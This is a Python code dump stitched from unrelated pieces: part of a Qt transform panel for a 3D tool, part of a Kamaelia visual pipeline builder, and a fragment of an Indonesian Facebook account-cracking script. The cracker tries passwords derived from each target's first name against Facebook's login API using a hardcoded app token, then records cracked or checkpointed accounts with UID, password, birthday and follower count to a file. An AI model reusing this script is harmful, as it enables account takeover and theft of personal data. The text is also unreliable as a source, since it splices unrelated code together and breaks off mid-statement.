self.main_layout.addWidget(scale_x, vn, tw, 1, text_b)
tw += text_b
self.but_scale_x = make_flat_button(icon=image_path+self.x_off, icon_size=axis_size,
name = '', text=text_col, bg=hilite, w_max=axis_w, h_max=axis_h)
self.main_layout.addWidget(self.but_scale_x, vn, tw, 1 ,axis_b)
tw += axis_b
#切り替え
select_scale = make_flat_button(icon=image_path+self.s, icon_size=(20, 20),
name = '', text=text_col, bg=hilite, w_max=sel_w, h_max=sel_h)
select_scale.clicked.connect(lambda : self.toggle_select_mode(mode=0))
self.main_layout.addWidget(select_scale, vn, tw, 1 ,sel_b)
vn+=1
#--------------------------------------------------------------------------------
tw = 0#配置場所
key_scale_y = make_flat_button(icon=image_path+'Key_N.png', name = '',
text=text_col, bg=hilite, checkable=False, w_max=24, tip=key_but_tip.output())
key_scale_y.clicked.connect(lambda : set_key_frame(mode=0, axis=1))
key_scale_y.rightClicked.connect(qt.Callback(lambda : set_key_frame(mode=0, axis=3)))
self.main_layout.addWidget(key_scale_y, vn, tw, 1, anim_b)
tw += anim_b
scale_y = self.make_line_edit(text=string_col, bg=bg_col)
scale_y.editingFinished.connect(qt.Callback(lambda : self.check_multi_selection(text=scale_y.text(), current=(0, 1))))#マルチラインは先にコネクト
scale_y.textChanged.connect(lambda : self.keep_pre_line_text(text=scale_y.text(), current=(0, 1)))#入力変更が成されたかどうかを判定するように即時保存を実行
scale_y.editingFinished.connect(qt.Callback(lambda : self.scaling(text=scale_y.text(), axis=1)))
self.main_layout.addWidget(scale_y, vn, tw, 1 ,text_b)
tw += text_b
self.but_scale_y = make_flat_button(icon=image_path+self.y_off, icon_size=axis_size,
name = '', text=text_col, bg=hilite, w_max=axis_w, h_max=axis_h)
self.main_layout.addWidget(self.but_scale_y, vn, tw, 1 ,axis_b)
tw += axis_b
#ロック状態切り替え
self.lock_attribute_scale = make_flat_button(icon=image_path+self.l, icon_size=(20, 20),
name = '', checkable=False, text=text_col, bg=hilite, w_max=sel_w, h_max=sel_h, tip=lock_but_tip.output())
self.lock_attribute_scale.clicked.connect(qt.Callback(lambda : self.attribute_lock_state(mode=0)))
self.lock_attribute_scale.rightClicked.connect(lambda : RockAttrMenu(name='Scale', mode=0))
self.main_layout.addWidget(self.lock_attribute_scale, vn, tw, 1 ,sel_b)
vn+=1
#--------------------------------------------------------------------------------
tw = 0#配置場所
key_scale_z = make_flat_button(icon=image_path+'Key_N.png', name = '',
text=text_col, bg=hilite, checkable=False, w_max=24, tip=key_but_tip.output())
key_scale_z.clicked.connect(lambda : set_key_frame(mode=0, axis=2))
key_scale_z.rightClicked.connect(qt.Callback(lambda : set_key_frame(mode=0, axis=3)))
self.main_layout.addWidget(key_scale_z, vn, tw, 1, anim_b)
tw += anim_b
scale_z = self.make_line_edit(text=string_col, bg=bg_col)
scale_z.editingFinished.connect(qt.Callback(lambda : self.check_multi_selection(text=scale_z.text(), current=(0, 2))))
scale_z.textChanged.connect(lambda : self.keep_pre_line_text(text=scale_z.text(), current=(0, 2)))#入力変更が成されたかどうかを判定するように即時保存を実行
scale_z.editingFinished.connect(qt.Callback(lambda : self.scaling(text=scale_z.text(), axis=2)))
self.main_layout.addWidget(scale_z, vn, tw, 1 ,text_b)
tw += text_b
self.but_scale_z = make_flat_button(icon=image_path+self.z_off, icon_size=axis_size,
name = '', text=text_col, bg=hilite, w_max=axis_w, h_max=axis_h)
self.main_layout.addWidget(self.but_scale_z, vn, tw, 1 ,axis_b)
tw += axis_b
#XYZ全部ボタン
self.but_scale_all = make_flat_button(icon=image_path+self.all_axis_icon, name='', text=text_col, bg=hilite, w_max=sel_w, h_max=sel_h)
self.main_layout.addWidget(self.but_scale_all, vn, tw, 1 ,sel_b)
vn+=1
#--------------------------------------------------------------------------------
self.trs_line_a = make_h_line()
self.main_layout.addWidget(self.trs_line_a, vn, 0, 1 ,11)
vn+=1
#--------------------------------------------------------------------------------
tw = 0#配置場所
#ローテーション
global rot_x
global rot_y
global rot_z
global key_rot_x
global key_rot_y
global key_rot_z
global select_rot
key_rot_x = make_flat_button(icon=image_path+'Key_N.png', name = '',
text=text_col, bg=hilite, checkable=False, w_max=24, tip=key_but_tip.output())
key_rot_x.clicked.connect(lambda : set_key_frame(mode=1, axis=0))
key_rot_x.rightClicked.connect(qt.Callback(lambda : set_key_frame(mode=1, axis=3)))
self.main_layout.addWidget(key_rot_x, vn, tw, 1, anim_b)
tw += anim_b
rot_x = self.make_line_edit(text=string_col, bg=bg_col)
rot_x.editingFinished.connect(qt.Callback(lambda : self.check_multi_selection(text=rot_x.text(), current=(1, 0))))
rot_x.textChanged.connect(lambda : self.keep_pre_line_text(text=rot_x.text(), current=(1, 0)))#入力変更が成されたかどうかを判定するように即時保存を実行
rot_x.editingFinished.connect(qt.Callback(lambda : self.rotation(text=rot_x.text(), axis=0)))
self.main_layout.addWidget(rot_x, vn, tw, 1 ,text_b)
tw += text_b
self.but_rot_x = make_flat_button(icon=image_path+self.x_off, icon_size=axis_size,
name = '', text=text_col, bg=hilite, w_max=axis_w, h_max=axis_h)
#qt.change_button_color(self.but_rot_x, textColor=text_col, bgColor=red)
self.main_layout.addWidget(self.but_rot_x, vn, tw, 1 ,axis_b)
tw += axis_b
#切り替え
select_rot = make_flat_button(icon=image_path+self.r, icon_size=(20, 20),
name = '', text=text_col, bg=hilite, w_max=sel_w, h_max=sel_h)
select_rot.clicked.connect(lambda : self.toggle_select_mode(mode=1))
self.main_layout.addWidget(select_rot, vn, tw, 1 ,sel_b)
vn+=1
#--------------------------------------------------------------------------------
tw = 0#配置場所
key_rot_y = make_flat_button(icon=image_path+'Key_N.png', name = '',
text=text_col, bg=hilite, checkable=False, w_max=24, tip=key_but_tip.output())
key_rot_y.clicked.connect(lambda : set_key_frame(mode=1, axis=1))
key_rot_y.rightClicked.connect(qt.Callback(lambda : set_key_frame(mode=1, axis=3)))
self.main_layout.addWidget(key_rot_y, vn, tw, 1, anim_b)
tw += anim_b
rot_y = self.make_line_edit(text=string_col, bg=bg_col)
rot_y.editingFinished.connect(qt.Callback(lambda : self.check_multi_selection(text=rot_y.text(), current=(1, 1))))
rot_y.textChanged.connect(lambda : self.keep_pre_line_text(text=rot_y.text(), current=(1, 1)))#入力変更が成されたかどうかを判定するように即時保存を実行
rot_y.editingFinished.connect(qt.Callback(lambda : self.rotation(text=rot_y.text(), axis=1)))
self.main_layout.addWidget(rot_y, vn, tw, 1 ,text_b)
tw += text_b
self.but_rot_y = make_flat_button(icon=image_path+self.y_off, icon_size=axis_size,
name = '', text=text_col, bg=hilite, w_max=axis_w, h_max=axis_h)
self.main_layout.addWidget(self.but_rot_y, vn, | |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------------------------------------
#
# First proper iteration of this code:
# * Sat Sep 16 11:24:50 BST 2006, passing through Coventry
#
# Was able to create a simple video server completely graphically.
#
# Issues:
# * Code needs tidying up
# * Want to be able to re-edit components that have already been created
# * Want to be able to delete already created components
# * Want to be able to break already created linkages
#
# Good start though !
#
# Sunday 17:
# * Can delete already created components
# * Can break already created linkages
#
#
# simple kamaelia pipeline builder GUI
# run this program
from Kamaelia.UI.Pygame.Button import Button
import Kamaelia.Support.Data.Repository
import Axon
import pprint
# Flatten the repository's component index: the repository keys are tuples
# of module-path parts; COMPONENTS keys them by dotted module name instead.
C = Kamaelia.Support.Data.Repository.GetAllKamaeliaComponents()
COMPONENTS = dict((".".join(key), value) for key, value in C.items())
import inspect
def getAllClasses( modules ):
    """Yield constructor descriptions for every class in *modules*.

    *modules* maps a dotted module name to a list of class names defined in
    that module.  Modules are visited in sorted name order; each yielded
    entry is a dict as produced by getModuleConstructorArgs().  Modules that
    fail to import are reported on stdout and skipped rather than aborting
    the whole scan.
    """
    _modules = list(modules.keys())
    _modules.sort()
    for modname in _modules:
        try:
            # One module may describe several classes; flatten them all
            # into a single stream for the caller.
            for entry in getModuleConstructorArgs( modname, modules[modname] ):
                yield entry
        except ImportError:
            # Best-effort scan: a broken/missing module is logged, not fatal.
            print "WARNING: Import Error: ", modname
            continue
def getModuleConstructorArgs( modulename, classnames):
    """Import *modulename* and describe the constructor of each named class.

    Returns a list of dicts, one per name in *classnames*, with keys:
    "module" (the dotted module name), "class" (the class name),
    "classdoc" / "initdoc" (docstrings of the class and its __init__),
    "args" (constructor signature as returned by getConstructorArgs) and
    "theclass" (the class object itself).

    Raises ImportError if the module cannot be imported, and AttributeError
    if a listed class is not defined in the module.
    """
    clist = []
    # A non-empty fromlist makes __import__ return the leaf module of a
    # dotted path rather than the top-level package.
    module = __import__(modulename, [], [], classnames)
    for classname in classnames:
        # getattr instead of eval("module."+classname): same attribute
        # lookup without evaluating a constructed string as code.
        theclass = getattr(module, classname)
        entry = { "module"   : modulename,
                  "class"    : classname,
                  "classdoc" : theclass.__doc__,
                  "initdoc"  : theclass.__init__.__doc__,
                  "args"     : getConstructorArgs(theclass),
                  "theclass" : theclass,
        }
        clist.append(entry)
    return clist
def getConstructorArgs(component):
    """Describe *component*'s __init__ signature.

    Returns a dict with keys:
      "std" -- list of [name] or [name, repr(default)] pairs, one per
               positional argument (the leading 'self' is removed);
      "*"   -- name of the *args parameter, or None;
      "**"  -- name of the **kwargs parameter, or None.

    Raises TypeError (after printing a diagnostic) when the constructor is
    not introspectable, e.g. a C-implemented __init__.
    """
    initfunc = eval("component.__init__")
    try:
        (args, vargs, vargkw, defaults) = inspect.getargspec(initfunc)
    except TypeError, e:
        print "FAILURE", str(component), repr(component), component
        raise e
    # One single-element list per argument name; defaults are appended below.
    arglist = [ [arg] for arg in args ]
    if defaults is not None:
        # getargspec aligns defaults with the *last* len(defaults) args,
        # so walk both sequences from the tail.
        for i in range(0,len(defaults)):
            arglist[-1-i].append( repr(defaults[-1-i]) )
    del arglist[0] # remove 'self'
    return {"std":arglist, "*":vargs, "**":vargkw}
class Magic(Axon.Component.component):
"This is where the magic happens"
"""
OK, basic actions needed:
* ADD COMPONENT (DONE)
* *This also needs to store what the arguments were* (DONE)
* Beyond the immediate scope of the visualiser component (DONE)
* Implies a filter of somekind (undecorate/decorate) (DONE)
* ADD COMPONENT (DONE)
* FOR EACH INBOX -- NEW (DONE)
* ADD AND LINK (DONE)
* FOR EACH OUTBOX -- NEW (DONE)
* ADD AND LINK (DONE)
* DELETE COMPONENT
* DELETE OUTBOXES -- NEW
* DELETE INBOXES -- NEW
* DELETE COMPONENT
* LINK -- NEW ( NO IMPLICIT LINK ANYMORE) (DONE)
* THIS BOX (DONE)
* TO THIS BOX (DONE)
"""
Inboxes = {
"from_panel" : "User events from the panel",
"from_topology" : "User events from the topology visualiser",
"makelink" : "Simple event to create links",
"inbox" : "unused, default",
"control" : "unused, default",
}
Outboxes={
"to_topology" : "Messages to control the topology",
"to_serialiser" : "Messages about the system topology are sent here for turning into code",
"signal" : "default, unused",
"outbox" : "default, unused",
}
def __init__(self):
super(Magic,self).__init__()
self.topologyDB = {}
self.LINKMODE = False
self.linksource = None
self.linksink = None
self.topology = []
    def main(self):
        """Main event loop (Axon generator).

        Polls three inboxes each pass and yields 1 to hand control back to
        the scheduler:
          * "from_panel"    -- ("ADD", ...) / ("DEL", ...) requests from the GUI panel;
          * "from_topology" -- ("SELECT", _, nodeid) events from the visualiser;
          * "makelink"      -- any message arms link-creation mode.
        """
        print "Let the magic begin!"
        while 1:
            if self.dataReady("from_panel"):
                event = self.recv("from_panel")
                print "MESSAGE FROM PANEL"
                pprint.pprint(event)
                if event[0] == "ADD":
                    # Create the node in the visualiser first, then mirror
                    # the returned node/box info into the local DB.
                    nodeinfo = self.addNodeToTopology(event)
                    self.addNodeLocalDB(event, nodeinfo)
                if event[0] == "DEL":
                    self.handleDeleteNode(event)
            if self.dataReady("from_topology"):
                event = self.recv("from_topology")
                if event[0] == "SELECT":
                    # Remember the most recently clicked node; selection also
                    # drives link creation (see debug_PrintCurrentNodeDetails).
                    self.currentSelectedNode = event[2]
                    print "HMM, the next should display the most recently selected node"
                    print "AHA! It does"
                    print "We need to tell the panel to update itself with these details then"
                    self.debug_PrintCurrentNodeDetails()
            if self.dataReady("makelink"):
                # Payload is irrelevant; receipt arms link mode and clears
                # any half-finished endpoint selection.
                self.recv("makelink")
                self.LINKMODE = True
                self.linksource = None
                self.linksink = None
            yield 1
    def handleDeleteNode(self, event):
        """
        Handle a deletion request from the panel.

        Messages look like this:
        * ("DEL", "2.control")   -- a box node (component id dot box name)
        * ("DEL", "2")           -- a whole component node

        Deleting a component removes the component node and all of its box
        nodes from the visualiser, then purges its links and DB entries.
        Deleting a box only removes the links attached to that box (inboxes
        only -- see below); the box node itself is kept.
        """
        print "DELETE NODE, identifying type", event
        nodeid = event[1]
        # First element of the DB record distinguishes COMPONENT/INBOX/OUTBOX.
        nodetype = self.topologyDB[nodeid][0]
        if nodetype == "COMPONENT":
            ( nodetype, label, inboxes, outboxes, event ) = self.topologyDB[nodeid]
            print "ASKED TO DELETE component"
            print "We need to do this:"
            print " * delete the component node"
            self.send( [ "DEL", "NODE", nodeid ], "to_topology" )
            print " * delete its inboxes"
            print inboxes
            for inbox in inboxes:
                boxid = inbox[0]
                self.send( [ "DEL", "NODE", boxid ], "to_topology" )
            print " * delete its outboxes"
            print outboxes
            for outbox in outboxes:
                boxid = outbox[0]
                self.send( [ "DEL", "NODE", boxid ], "to_topology" )
            """
            We need to do this:
            * delete the component node
            * delete its inboxes
            [['1.control', 'control'], ['1.inbox', 'inbox']]
            * delete its outboxes
            [['1.outbox', 'outbox'], ['1.signal', 'signal']]
            * delete linkages to/from said linkages
            NEED TO REMOVE LINKAGE ['1.outbox', '3.inbox']
            This needs to be removed from:
            self.topology
            self.topologyDB
            also needs to be removed from the axon visualiser
            (del node requests)
            """
            # Remove links from self.topology
            self.topology = [ link for link in self.topology if not self.matchesNode(nodeid, link) ]
            # remove inboxes from topologyDB
            inboxids = [ x[0] for x in inboxes ]
            for boxid in inboxids:
                del self.topologyDB[boxid]
            # remove outboxes from topologyDB
            outboxids = [ x[0] for x in outboxes ]
            for boxid in outboxids:
                del self.topologyDB[boxid]
            # Deleted the component itself from the topologyDB
            del self.topologyDB[nodeid]
        else:
            # A box node: boxes cannot be deleted (they belong to their
            # component), so only the attached linkages are removed.
            boxid = nodeid
            ( boxtype, label, nodeid ) = self.topologyDB[boxid]
            print "ASKED TO DELETE box"
            print " * Can't actually do that!"
            print " * Deleting linkages to/from that box instead!"
            if boxtype == "INBOX":
                print "DELETING AN INBOX!", nodeid, boxid
                # Remove links from visualiser
                for link in self.topology:
                    if self.matchesNode(boxid, link):
                        source, sink = link
                        print [ "DEL", "LINK", source, sink ], "to_topology", boxid, link, nodeid
                        self.send( [ "DEL", "LINK", source, sink ], "to_topology" )
                # Remove links from self.topology
                self.topology = [ link for link in self.topology if not self.matchesNode(boxid, link) ]
            if boxtype == "OUTBOX":
                # NOTE(review): outbox link removal is not implemented --
                # only this message is printed; links survive. TODO confirm intended.
                print "DELETING AN OUTBOX!"
        self.updateSerialiser()
def updateSerialiser(self):
self.send( { "nodes": self.topologyDB, "links": self.topology },
"to_serialiser")
def makeLink(self):
self.send( [ "ADD", "LINK",
self.linksource,
self.linksink,
], "to_topology" )
self.topology.append([self.linksource,self.linksink])
self.updateSerialiser()
def matchesNode(self, nodeid, link):
print "nodeid, link", nodeid, link
linksource,linksink = link
if "." not in nodeid:
print "HERE 1"
source, sourcebox = linksource.split(".")
sink, sinkbox = linksink.split(".")
print "(source == nodeid)", (source == nodeid)
print "(sink == nodeid)", (sink == nodeid)
return (source == nodeid) or (sink == nodeid)
else:
print "HERE 2"
print "(linksource == nodeid)", (linksource == nodeid)
print "(linksink == nodeid)", (linksink == nodeid)
return (linksource == nodeid) or (linksink == nodeid)
    def debug_PrintCurrentNodeDetails(self):
        """Print the currently selected node's DB record; when link mode is
        armed, also treat the selection as a link endpoint.

        First selection in link mode becomes the source; the second becomes
        the sink, triggers makeLink() and disarms link mode.  A deselection
        (None) just disarms link mode.
        """
        print "CURRENT NODE", self.currentSelectedNode
        if self.currentSelectedNode is None:
            # Deselect: abandon any half-built link.
            self.LINKMODE = False
            return
        if self.LINKMODE:
            if self.linksource == None:
                self.linksource = self.currentSelectedNode
            else:
                self.linksink = self.currentSelectedNode
                self.makeLink()
                self.LINKMODE = False
        print self.topologyDB[self.currentSelectedNode]
def addNodeLocalDB(self, event, nodeinfo):
( nodeid, label, inboxes, outboxes ) = nodeinfo
self.topologyDB[nodeid] = ( "COMPONENT", label, inboxes, outboxes, event )
for inbox in inboxes:
( boxid, label ) = inbox
self.topologyDB[boxid] = ( "INBOX", label, nodeid )
for outbox in outboxes:
( boxid, label ) = outbox
self.topologyDB[boxid] = ( "OUTBOX", label, nodeid )
self.updateSerialiser()
def addNodeToTopology(self,event):
print "ADD NODE"
nodeid = "ID"
label = "LABEL"
(label, nodeid) = event[1]
self.send( ["ADD", "NODE",
nodeid,
label,
"randompos",
"component"
], "to_topology" )
inboxes = []
for inbox in event[3]["configuration"]["theclass"].Inboxes:
boxid = str(nodeid) + "." + inbox
self.send( [ "ADD", "NODE",
boxid,
inbox,
"randompos",
"inbox"
], "to_topology" )
self.send( [ "ADD", "LINK",
nodeid,
boxid,
], "to_topology" )
inboxes.append( [ boxid, inbox] )
outboxes = []
for outbox in event[3]["configuration"]["theclass"].Outboxes:
boxid = str(nodeid) + "." + outbox
self.send( [ "ADD", "NODE",
boxid,
outbox,
"randompos",
"outbox"
], "to_topology" )
self.send( [ "ADD", "LINK",
nodeid,
boxid,
], "to_topology" )
outboxes.append( [ | |
c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
oks.append(user + pass1 + birthday + subscribers)
elif 'www.facebook.com' in w['error_msg']:
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;93m(!) [Cekpoint]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print '\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass1
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
cek = open('out/ind1.txt', 'a')
cek.write('UID:' + user + ' Katasandi:' + pass1 + 'Tanggal Lahir:' + birthday + 'Followers:' + subscribers + '\n')
cek.close()
cekpoint.append(user + pass1 + birthday + subscribers)
else:
pass2 = c['first_name'] + '<PASSWORD>'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;92m(!) [Berhasil]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print '\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass2
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
oks.append(user + pass2 + birthday + subscribers)
elif 'www.facebook.com' in w['error_msg']:
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;93m(!) [Cekpoint]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print '\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass2
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
cek = open('out/ind1.txt', 'a')
cek.write('UID:' + user + ' Katasandi:' + pass2 + 'Tanggal Lahir:' + birthday + 'Followers:' + subscribers + '\n')
cek.close()
cekpoint.append(user + pass2 + birthday + subscribers)
else:
pass3 = c['first_name'] + '<PASSWORD>'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
w = json.load(data)
if 'access_token' in w:
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;92m(!) [Berhasil]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print '\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass3
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
oks.append(user + pass3 + birthday + subscribers)
elif 'www.facebook.com' in w['error_msg']:
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;93m(!) [Cekpoint]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print '\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass3
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
cek = open('out/ind1.txt', 'a')
cek.write('UID:' + user + ' Katasandi:' + pass3 + 'Tanggal Lahir:' + birthday + 'Followers:' + subscribers + '\n')
cek.close()
cekpoint.append(user + pass3 + birthday + subscribers)
else:
pass4 = '<PASSWORD>'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
w = json.load(data)
if 'access_token' in w:
